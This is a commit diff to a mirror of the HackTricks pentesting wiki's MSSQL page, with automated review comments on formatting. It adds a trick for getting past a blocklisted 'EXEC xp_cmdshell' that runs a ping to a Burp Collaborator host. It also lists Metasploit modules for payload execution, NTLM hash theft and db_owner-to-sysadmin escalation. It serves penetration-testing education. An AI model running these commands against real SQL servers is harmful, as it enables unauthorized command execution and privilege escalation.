mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [#2811] mssql trick

This commit is contained in:
CPol 2021-10-27 09:30:33 +00:00 committed by gitbook-bot
parent 3896ea2eb9
commit b150f0adc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF


@ -10,8 +10,8 @@ If you want to **share some tricks with the community** you can also submit **pu
## Basic Information
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
**Default port:** 1433
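Review bot: the backslash-escaped underscores in the link destinations (`Relational\_database\_management\_system`, `Microsoft\_SQL\_Server`) are GitBook serializer output rather than a content edit; CommonMark treats `\_` in a link destination as a literal underscore, so the links still resolve, but the unescaped form on the removed lines is the cleaner source and is what other markdown tooling expects. A commit titled "mssql trick" is easier to review if these automated escaping rewrites are kept out of it.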
@ -82,7 +82,7 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
msf> use windows/manage/mssql_local_auth_bypass
```
### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
### [**Brute force**](../brute-force.md#sql-server)
## Tricks
@ -102,6 +102,9 @@ sp_configure 'xp_cmdshell', '1'
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Bypass blackisted "EXEC xp_cmdshell"
; DECLARE @x AS VARCHAR(100)=xp_cmdshell; EXEC @x ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net
```
### NTLM Service Hash gathering
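Review bot: the two new comment lines use `#`, which is not a T-SQL comment marker (`--` or `/* */` is), so the block cannot be pasted into a query session as-is; "blackisted" on the second comment should read "blacklisted". The hard-coded `k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net` hostname is a one-off Collaborator id and should be replaced with a placeholder such as `<your-collaborator-host>` so readers do not point their test traffic at someone else's listener.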
@ -117,11 +120,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
### **Read files executing scripts (Python and R)**
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
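Review bot: the modified line keeps the grammar error "These code will be executed by a **different user**"; it should read "This code is executed by a **different user**". The unchanged context line below it also misspells "Hello World!" as "Hellow World!", and the example it introduces is an R hello-world rather than a file read, so the heading "Read files executing scripts (Python and R)" and the example do not match yet.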
@ -143,9 +146,9 @@ print(sys.version)
GO
```
### From db_owner to sysadmin
### From db\_owner to sysadmin
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
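Review bot: the sentence on the modified line is split into six adjacent links that all point to the same NetSPI URL; collapse it into a single link, e.g. `[If you have the **credentials of a db_owner user**, you can become **sysadmin** and **execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)`, so the rendered text is not a run of link fragments. The `db\_owner` escape in the heading is, as elsewhere in this commit, serializer output; the heading renders identically without it.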